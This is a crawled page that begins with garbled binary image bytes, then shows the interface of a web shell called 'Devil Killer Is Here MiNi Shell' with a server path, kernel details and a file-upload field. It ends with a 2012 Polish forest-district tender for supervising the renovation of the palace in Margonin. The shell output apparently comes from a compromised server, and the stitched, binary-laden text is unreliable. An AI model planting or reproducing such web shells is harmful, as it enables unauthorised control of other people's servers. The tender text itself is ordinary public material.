JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/67358-N-2012.html

<p class="kh_header"><b>Chodzież: Pełnienie funkcji inspektora nadzoru inwestorskiego dla realizacji zadania pn. Remont wraz z przebudową, rozbudową i zmianą sposobu użytkowania Pałacu w Margoninie</b><br>
<b>Numer ogłoszenia: 67358 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Podanin , Podanin 65, 64-800 Chodzież, woj. wielkopolskie, tel. 067 2828019, 2829897, 2810781, faks 067 2810785.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_podanin/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego dla realizacji zadania pn. Remont wraz z przebudową, rozbudową i zmianą sposobu użytkowania Pałacu w Margoninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonawca musi zapewnić kompleksowy nadzór inwestorski przy realizacji ww. zadania, w ramach którego będzie sprawowany nadzór inwestorski nad robotami:
a.	konstrukcyjno - budowlanymi,
b.	konserwatorskimi,
c.	instalacyjnymi w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych,
d.	instalacyjnymi w zakresie sieci, instalacji, urządzeń wodociągowych, kanalizacyjnych, cieplnych i wentylacyjnych.
c.	Wykonawca zobowiązany jest do wyznaczenia jednego spośród inspektorów nadzoru posiadających uprawnienia budowlane w zakresie ww. specjalności, jako koordynatora wszelkich czynności na budowie. 
d.	Wykonawca będzie wspierał Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją zadania inwestycyjnego.
e.	Wykonawca zobowiązany będzie do zapewnienia stałej wymiany informacji z Zamawiającym oraz koordynacji swojej działalności zgodnie z wymaganiami Zamawiającego.
f.	Zakres praw i obowiązków Inspektora nadzoru wynika:
a.	z art. 17, art. 25, art. 26 Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), 
b.	przepisów prawa polskiego,
c.	z postanowień odpowiednich decyzji,
d.	pozwoleń na prowadzenie budowy,
e.	umowy z Wykonawcą na roboty budowlane
		w zakres podstawowych obowiązków Inspektora nadzoru inwestorskiego wchodzą:
reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;
sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;
sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie inwestora, kontrolowanie rozliczeń budowy.
g.	Inspektor nadzoru inwestorskiego ma prawo:
wydawać kierownikowi budowy lub kierownikowi robót polecenia, potwierdzone wpisem do dziennika budowy dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
h.	Dokumentowanie i archiwizowanie całej dokumentacji dotyczącej realizacji przedmiotu zamówienia oraz przekazanie jej Zamawiającemu po zakończeniu wykonywania realizacji przedmiotu umowy. 

II.	OBOWIĄZKI WYKONAWCY W OKRESIE POPRZEDZAJĄCYM REALIZACJĘ BUDOWY
1.	Zapoznanie się z:
a.	dokumentacją projektowo - kosztorysową;
b.	specyfikacją techniczną wykonania i odbioru robót;
c.	warunkami pozwolenia na budowę;
d.	terenem budowy, jego uzbrojeniem i istniejącymi urządzeniami.
2.	Udział w procedurze zamówienia publicznego w celu wyłonienia Generalnego Wykonawcy robót budowlanych w zadaniu pn. Remont wraz przebudową, rozbudową i zmianą sposobu użytkowania Pałacu w Margoninie poprzez:
a.	przygotowanie w porozumieniu z Zamawiającym:
opisu przedmiotu zamówienia,  
warunków udziału w postępowaniu, 
projektu umowy z Generalnym Wykonawcą robót budowlanych,
odpowiedzi na zapytania oferentów w trakcie trwania procedury przetargowej;
b.	pomoc w sprawdzeniu ofert Wykonawców robót budowlanych,
c.	sporządzenie treści wzywających do uzupełnienia, wyjaśnienia bądź poprawienia omyłek rachunkowych Wykonawców robót budowlanych,
d.	obecność przy podpisaniu umowy z Generalnym Wykonawcą na roboty budowlane,
e.	ewentualne wsparcie Zamawiającego przed Krajową Izbą Odwoławczą i Sądami Okręgowymi,
zgodnie z Ustawą Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) oraz Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.).
3.	Opracowanie i przedstawienie do akceptacji Zamawiającemu w terminie do 7 dni od dnia podpisania umowy schematu organizacyjnego zespołu Wykonawcy wraz ze szczegółowym zakresem obowiązków i uprawnień jakie zamierza powierzyć poszczególnym członkom zespołu.
4.	Dostarczenie przed podpisaniem umowy z Inspektorem Nadzoru:
a.	dokumentów potwierdzających uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie osób biorących udział w wykonywaniu przedmiotu zamówienia dla każdej z branż w zakresie pełnym (nieograniczonym);
b.	zaświadczeń o przynależności do Okręgowej Izby Inżynierów Budownictwa osób biorących udział w wykonywaniu przedmiotu zamówienia będących potwierdzeniem opłacania przez Wykonawców składki na wymagane ubezpieczenie od odpowiedzialności cywilnej.   
5.	Udział Wykonawcy w przekazaniu terenu placu budowy Generalnemu Wykonawcy robót budowlanych.
6.	Weryfikacja Planu Bezpieczeństwa i Ochrony Zdrowia (BIOZ), wykonanego przez Generalnego Wykonawcę robót budowlanych.
7.	Zaopiniowanie harmonogramu rzeczowo - finansowego robót przedstawionego przez Generalnego Wykonawcę robót budowlanych.

III.	OBOWIĄZKI WYKONAWCY NA ETAPIE PROWADZENIA ROBÓT BUDOWLANYCH
1.	Ścisła współpraca Wykonawcy z projektantami pełniącymi nadzór autorski - firmą Inwestproj z siedzibą przy ulicy Kozackiej 17-19/6, 87-100 Toruń.
2.	Opiniowanie listy podwykonawców zaproponowanych przez Generalnego Wykonawcę robót budowlanych i przedkładanie jej do zatwierdzenia przez Zamawiającego.
3.	Opiniowanie wniosków Generalnego Wykonawcy robót budowlanych  w przypadku nowej pozycji personelu, wymaganymi zapisami SIWZ na roboty budowlane i przedkładanie jej do zatwierdzenia przez Zamawiającego.
4.	Stałe monitorowanie i nadzór nad przebiegiem realizacji robót budowlanych pod kątem ich jakości i terminowości, a w szczególności:
a.	Udzielanie Generalnemu Wykonawcy robót budowlanych wszelkich dostępnych informacji i wyjaśnień dotyczących kontraktu;
b.	Uzgadnianie miejsc tymczasowego składowania materiałów w obrębie terenu budowy oraz ich kontrola. 
c.	Kontrolowanie Generalnego Wykonawcy robót budowlanych w zakresie stosowanych materiałów z wymaganiami Specyfikacji Technicznych;
d.	Kontrolowanie uporządkowania miejsc składowania materiałów po zakończeniu robót;
e.	Opiniowanie wniosków Generalnego Wykonawcy robót budowlanych o wyborze równoważnego materiału, gdy przewiduje to dokumentacja projektowa lub specyfikacja techniczna;
f.	Bieżąca weryfikacja efektu prowadzonych robót z dokumentacją projektową pod kątem wykrycia, a następnie usunięcia, ewentualnych nieprawidłowości i wad lub dokonania ulepszeń albo konieczności wykonania dokumentacji szczegółowej, a także pod kątem optymalizacji kosztów budowy;
g.	Kontrola postępu robót w stosunku do przyjętego harmonogramu;
h.	Zapewnienie, że roboty budowlane wykonywane są przy zachowaniu należytego poziomu ochrony zdrowia i bezpieczeństwa;
i.	Zatwierdzanie materiałów budowlanych, instalacyjnych, urządzeń i dostaw przewidzianych przez Generalnego Wykonawcę robót budowlanych do wbudowania;
j.	Kontrola dokumentów jakości, aprobat, deklaracji zgodności, atestów, certyfikatów itp. w celu nie dopuszczenia do wbudowania materiałów wadliwych lub niedopuszczonych do stosowania w budownictwie;
k.	Egzekwowanie od Generalnego Wykonawcy robót budowlanych stosowania przepisów dotyczących ochrony środowiska, poprzez uzgadnianie lokalizacji baz, magazynów, warsztatów, składowisk, dróg dojazdowych na i wokół terenu budowy;
l.	Sprawdzanie posiadania i dopilnowanie przedłożenia przez Generalnego Wykonawcę robót budowlanych wymaganych w zamówieniu na roboty ubezpieczeń i gwarancji;
m.	Przeprowadzenie po uprzednim zawiadomieniu Zamawiającego, odbiorów częściowych i końcowych od Generalnego Wykonawcy robót budowlanych;
n.	Zatwierdzanie protokołów odbioru robót;
o.	Organizacja i przewodniczenie w co najmniej  miesięcznych oraz okresowych naradach dotyczących postępu robót, w których biorą udział przedstawiciele wszystkich zaangażowanych w realizację zadania stron;
p.	Sporządzanie protokołów z tych narad i przekazywanie ich Zamawiającemu i Generalnemu Wykonawcy robót budowlanych w terminie 3 dni od dnia narady;
q.	Bieżące egzekwowanie ustaleń z narad dotyczących postępu prac oraz narad technicznych;
r.	Nadzorowanie przeprowadzanych prób i rozruchów oraz weryfikacji i zatwierdzenia opracowanych przez Generalnego Wykonawcę robót budowlanych instrukcji eksploatacyjnych, w celu ułatwienia przekazana Zamawiającemu obiektu do eksploatacji;
s.	Dokonywanie bez zbędnej zwłoki odbioru robót zanikających i ulegających zakryciu i dokumentowanie tych czynności;
t.	Zapewnienie dokumentowania przebiegu robót w dzienniku budowy lub/i w innej uzgodnionej z Zamawiającym formie oraz kontrola prawidłowości prowadzenia dziennika  budowy;
u.	W czasie każdorazowego pobytu na budowie Wykonawca ma obowiązek dokonania bieżącego przeglądu dziennika budowy oraz potwierdzenia swojej obecności i dokonywania czynności stosownym wpisem;
v.	W razie konieczności wykonania robót dodatkowych lub zamiennych Wykonawca działając  ściśle w porozumieniu z Zamawiającym spisuje z koordynatorem budowy i Zamawiającym protokół konieczności, podając przybliżony koszt tych robót i występuje z wnioskiem do Zamawiającego w sprawie ich wykonania oraz opracowania, w miarę potrzeby, dla tych robót niezbędnej dokumentacji projektowo - kosztorysowej;
w.	W razie potrzeby wykonania robót dodatkowych, wynikających z konieczności zapobieżenia bezpośredniemu niebezpieczeństwu, zabezpieczenia robót już wykonanych lub uniknięcia strat, Wykonawca jest zobowiązany podjąć wiążącą Generalnego Wykonawcę robót decyzję co do natychmiastowego wykonania takich robót dodatkowych. O powziętej decyzji Wykonawca zawiadamia niezwłocznie Zamawiającego
x.	Wykonawca sprawdzi kosztorysy ewentualnych robót dodatkowych pod względem merytorycznym i formalno - prawnym;
y.	Kontrola zabezpieczenia elementów zabytkowych w przypadku ich odkrycia i niezwłoczne zawiadomienie właściwego konserwatora zabytków
z.	Sygnalizowanie Zamawiającemu zagrożeń realizacji przedmiotu zamówienia przez Generalnego Wykonawcę robót budowlanych i jego mianowanych podwykonawców (o ile będą zatrudnieni);
aa.	Współpraca z Generalnym Wykonawcą robót budowlanych w celu uniknięcia lub zredukowania skutków wydarzeń i okoliczności, które mogą wpłynąć na jakość robót lub planowaną datę zakończenia;
bb.	Wnioskowanie Zamawiającemu wszelkich niezbędnych działań mających na celu zniwelowanie ewentualnych opóźnień w robotach;
cc.	W miarę możliwości doprowadzanie do polubownego rozwiązywania sporów z Generalnym Wykonawcą robót budowlanych;
dd.	Wnioskowanie Zamawiającemu zastosowania kar umownych i innych środków dyscyplinujących wobec Generalnego Wykonawcy robót budowlanych;
ee.	Wnioskowanie o rozwiązanie umowy z Generalnym Wykonawcą robót budowlanych w przypadkach określonych w umowie;
ff.	Ochrona interesów Zamawiającego pod kątem uniknięcia ewentualnych roszczeń odszkodowawczych osób trzecich powstałych podczas lub w związku z prowadzonymi robotami.
5.	Nadzorowanie robót budowlanych w celu sprawdzania jakości ich wykonywania oraz wbudowanych materiałów zgodnie z wymaganiami:
a.	dokumentacji projektowej,
b.	specyfikacji technicznych,
c.	wiedzą techniczną i praktyką inżynierską w częstotliwości zapewniającej skuteczny nadzór (minimum 3 razy w tygodniu inspektor nadzoru pełniący funkcję koordynatora  zespołu nadzoru, pozostali inspektorzy w częstotliwości zależnej od rodzaju wykonywanych robót) oraz wg potrzeb Zamawiającego i Generalnego Wykonawcy robót budowlanych.
6.	Dostosowanie czasu pracy do czasu pracy Generalnego Wykonawcy robót budowlanych oraz Zamawiającego.
7.	Opiniowanie pod względem konieczności wykonania wszelkich robót dodatkowych i zamiennych;
8.	Uzgadnianie dokonania koniecznych zmian z autorem dokumentacji projektowej oraz Zamawiającym;
9.	Reprezentowanie interesów Zamawiającego (w uzgodnionym zakresie) wobec wszelkich organów administracji publicznej oraz specjalistycznych służb w zakresie wynikającym z przygotowania i realizacji przedmiotu zamówienia, na podstawie odrębnych pełnomocnictw (upoważnień) udzielonych przez Zamawiającego;
10.	Prowadzenie dokumentacji fotograficznej budowy (w formie cyfrowej) i załączenie jej do dokumentacji zakończenia robót budowlanych;
11.	Przygotowywanie komunikatów i fotografii (w formie cyfrowej) dotyczących postępów robót i sytuacji na budowie przeznaczonych do publikacji na stronach internetowych Zamawiającego - raz na miesiąc.
12.	Sporządzenie w uzgodnieniu z Zamawiającym harmonogramu i nadzór nad realizacją szkoleń dla wybranego przez Zamawiającego personelu przewidzianego do obsługi wbudowanych instalacji, prowadzonych przez Generalnego Wykonawcę robót budowlanych;
13.	Ponadto do zadań Inspektora Nadzoru Inwestorskiego będą należeć:
a.	przestrzeganie zasady, że przepływ informacji pomiędzy stronami (Zmawiającym i Generalnym Wykonawcą robót budowlanych) będzie odbywał się drogą korespondencyjną tzn. tylko na piśmie. Powiadomienie ważne jest tylko wtedy, jeśli zostanie odebrane zgodnie z przyjętymi zasadami lub przepisami Kodeksu cywilnego.
14.	Przygotowanie dla potrzeb Zamawiającego danych potrzebnych do sporządzenia dokumentów OT i książek obiektów;

IV.	OBOWIĄZKI WYKONAWCY ZWIĄZANE Z ROZLICZANIEM INWESTYCJI
1.	Współpraca z Zamawiającym przy rozliczeniach związanych z realizacją przedmiotu zamówienia z Generalnym Wykonawcą robót budowlanych;
2.	Opiniowanie każdej faktury wystawionej przez Generalnego Wykonawcę robót budowlanych na rzecz Zamawiającego, zgodnie z umową o roboty budowlane;
3.	Współpraca przy końcowym rozliczeniu z Wykonawcą robót budowlanych oraz uzyskanie pisemnych potwierdzeń od podwykonawców, że Generalny Wykonawca robót budowlanych nie zalega z płatnościami;

V.	OBOWIĄZKI WYKONAWCY ZWIĄZANE Z ODBIOREM OBIEKTU LUB ROBÓT I UZYSKANIEM POZWOLENIA NA UŻYTKOWANIE:
1.	Przeprowadzenie końcowej inspekcji przed odbiorem końcowym oraz przygotowanie listy wad oraz innych brakujących dokumentów, które miały być złożone zgodnie z umową przez Generalnego Wykonawcę robót budowlanych;
2.	Po zakończeniu robót oraz wykonaniu przewidzianych w odrębnych przepisach i umowie prób i sprawdzeń, Wykonawca potwierdza w dzienniku budowy zapis kierownika budowy o gotowości obiektu lub robót do odbioru oraz należyte urządzenie i uporządkowanie terenu budowy;
3.	Zweryfikowanie i zatwierdzenie kompletnej dokumentacji powykonawczej, a następnie dostarczenie jej do Zamawiającego wraz z dokumentacją związaną z nadzorowaną budową w formie ustalonej z Zamawiającym;
4.	Dokonanie przy udziale Zamawiającego odbioru końcowego przedmiotu zamówienia od Generalnego Wykonawcy robót budowlanych.
5.	Doprowadzenie do uzyskania pozwolenia na użytkowanie obiektu przez Generalnego Wykonawcę robót budowlanych na rzecz i w imieniu Zamawiającego oraz przeprowadzenie wszelkich czynności poprzedzających, w tym m.in.:
a.	Kontrola Generalnego Wykonawcy robót budowlanych w zakresie opracowania wszelkiej dokumentacji niezbędnej do uzyskania pozwolenia na dopuszczenie obiektu do  użytkowania i eksploatacji;
b.	Kontrola Generalnego Wykonawcy robót budowlanych w zakresie dokonania wszelkich prób, zgłoszeń zakończenia robót oraz uzyskanie wymaganych zgód od właściwych organów i instytucji;
c.	Skompletowanie dokumentacji i oświadczeń Generalnego Wykonawcy robót budowlanych wymaganych odpowiednimi przepisami oraz współdziałanie z Zamawiającym celem uzyskania pozwolenia na użytkowanie obiektu;
d.	Przygotowanie wniosku (wraz z dokumentację) o wydanie decyzji pozwolenia na użytkowanie;
6.	Uczestniczenie w komisjach przekazania obiektu do użytkowania;
7.	Doprowadzenie do oddania obiektu do użytkowania. 

VI.	OBOWIĄZKI WYKONAWCY PODCZAS TRWANIA OKRESU GWARANCYJNEGO:
1.	Udział w przeglądach gwarancyjnych, raz na pół roku, z udziałem Generalnego Wykonawcy robót budowlanych i Zamawiającego;
2.	Odbiór wykonanych robót budowlanych związanych z usunięciem wad, wskazanych w przeglądach gwarancyjnych;
3.	Procedowanie procedur usunięcia usterek w przypadku nie usunięcia ich w terminie kontraktowym, zgodnie z warunkami umowy na roboty budowlane;
4.	Wspieranie Zamawiającego w negocjacjach dotyczących nierozstrzygniętych roszczeń i sporów;

VII.	POZOSTAŁE OBOWIĄZKI WYKONAWCY:
1.	Na każdym etapie realizacji przedmiotu zamówienia Inspektor nadzoru zapewni Zamawiającemu wszelką niezbędną pomoc w zakresie zarządzania kontraktem
2.	Inspektor nadzoru ma obowiązek realizować wszystkie inne polecenia i zarządzenia Zamawiającego, nie wymienione powyżej, które będą niezbędne dla prawidłowej realizacji rozliczenia przedmiotu zamówienia i będą służyły zabezpieczeniu interesów Zamawiającego;
3.	Inspektor nadzoru nie może zwolnić którejkolwiek ze stron biorących udział w realizacji przedmiotu zamówienia z jakichkolwiek obowiązków, zobowiązań lub odpowiedzialności wynikających z umowy o roboty budowlane;
4.	w przypadku przesunięcia daty podpisania umowy z Generalnym Wykonawcą robót budowlanych w stosunku do planowanej, Wykonawca nie będzie wnosił roszczeń wobec Zamawiającego o wypłatę dodatkowego wynagrodzenia z tytułu tego przesunięcia;
5.	W przypadku wydłużenia okresu realizacji robót budowlanych ponad okres wskazany w umowie, Wykonawca zobowiązuje się świadczyć usługi stanowiące przedmiot zamówienia do czasu faktycznego zakończenia robót oraz rozliczenia końcowego kontraktu;
6.	W przypadku, gdy planowany okres realizacji robót budowlanych ulegnie wydłużeniu w stosunku do zakładanego w umowie,  Wykonawca zobowiązany jest do wystąpienia z wnioskiem o dodatkowe wynagrodzenie oraz o zmianę terminu wykonania przedmiotu zamówienia. Dodatkowe wynagrodzenie Wykonawcy zostanie wyliczone jako średnia miesięczna wynagrodzenia z umowy podstawowej Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8, 71.54.00.00-5, 71.54.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości: 4.500,00 zł (słownie: cztery tysiące pięćset złotych), w terminie do dnia 16.03.2012 r. do godziny 9:00 - decyduje data wpływu środków do Zamawiającego.

2.	Wadium może być wnoszone:
a)	w pieniądzu - przelewem na rachunek bankowy Nadleśnictwa Podanin w Banku Zachodnim WBK SA I Oddział Chodzież nr 14 1090 1317 0000 0000 3100 3726 z dopiskiem: wadium na zabezpieczenie oferty przetargowej zadania pn.: Pełnienie funkcji inspektora nadzoru inwestorskiego - Pałac w Margoninie.
Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w księgowości Nadleśnictwa Podanin od poniedziałku do piątku od 7.00 - 15.00.
3.	Wadium może być wniesione w jednej lub kilku formach.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w - tym okresie minimum jedną usługę podobną do usługi objętej przedmiotem zamówienia. Za usługę podobną Zamawiający uzna usługę polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego w branżach: konstrukcyjno-budowlanej, konserwatorskiej, sanitarnej i elektrycznej przy realizacji zadań inwestycyjnych spełniających warunki określone w tiret 1:
obiekt znajdował się pod opieką konserwatora zabytków a wartość zadania inwestycyjnego wynosiła min. 10.000.000 zł brutto.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę dla każdej z części, na zasadzie SPEŁNIA NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
